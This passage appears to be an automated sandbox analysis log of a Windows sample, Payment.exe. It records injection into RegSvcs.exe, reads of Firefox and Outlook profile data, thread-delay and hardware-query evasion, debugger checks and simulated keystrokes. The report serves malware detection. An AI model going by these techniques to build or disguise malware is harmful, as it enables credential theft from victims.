                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B28713 AdjustTokenPrivileges,CloseHandle,0_2_00B28713
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B28CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B28CC3
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B3B59E
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B4F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00B4F121
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B486D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00B486D0
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AD4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00AD4FE9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Users\user\AppData\Local\Temp\aut29F3.tmpJump to behavior
                    Source: Payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Payment.exeReversingLabs: Detection: 43%
                    Source: Payment.exeVirustotal: Detection: 36%
                    Source: unknownProcess created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"
                    Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Payment.exe"
                    Source: C:\Users\user\Desktop\Payment.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Payment.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Payment.exeStatic file information: File size 1062912 > 1048576
                    Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wntdll.pdbUGP source: Payment.exe, 00000000.00000003.2152965174.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Payment.exe, 00000000.00000003.2153287366.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Payment.exe, 00000000.00000003.2152965174.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Payment.exe, 00000000.00000003.2153287366.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B4C304 LoadLibraryA,GetProcAddress,0_2_00B4C304
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF8B85 push ecx; ret 0_2_00AF8B98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_017E0C3D push edi; ret 2_2_017E0CC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_017E0C95 push edi; retf 2_2_017E0C3A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C0FAF3 push es; ret 2_2_06C0FAF4
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AD4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00AD4A35
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B555FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B555FD
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AF33C7
                    Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1251Jump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeAPI coverage: 4.6 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B34696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B34696
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B3C9C7
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3C93C FindFirstFileW,FindClose,0_2_00B3C93C
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B3F200
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B3F35D
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B3F65E
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B33A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B33A2B
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B33D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B33D4E
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B3BF27
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AD4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AD4AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99542Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99212Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98231Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97577Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96799Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96451Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96120Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: RegSvcs.exe, 00000002.00000002.3390903447.0000000006590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Payment.exeAPI call chain: ExitProcess graph end nodegraph_0-99207
                    Source: C:\Users\user\Desktop\Payment.exeAPI call chain: ExitProcess graph end nodegraph_0-99276
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B441FD BlockInput,0_2_00B441FD
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AD3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AD3B4C
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B05CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B05CCC
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B4C304 LoadLibraryA,GetProcAddress,0_2_00B4C304
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_021434F0 mov eax, dword ptr fs:[00000030h]0_2_021434F0
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_02143550 mov eax, dword ptr fs:[00000030h]0_2_02143550
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_02141ED0 mov eax, dword ptr fs:[00000030h]0_2_02141ED0
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B281F7
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AFA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AFA395
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AFA364 SetUnhandledExceptionFilter,0_2_00AFA364
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Payment.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1029008Jump to behavior
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B28C93 LogonUserW,0_2_00B28C93
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AD3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AD3B4C
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AD4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00AD4A35
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B34EF5 mouse_event,0_2_00B34EF5
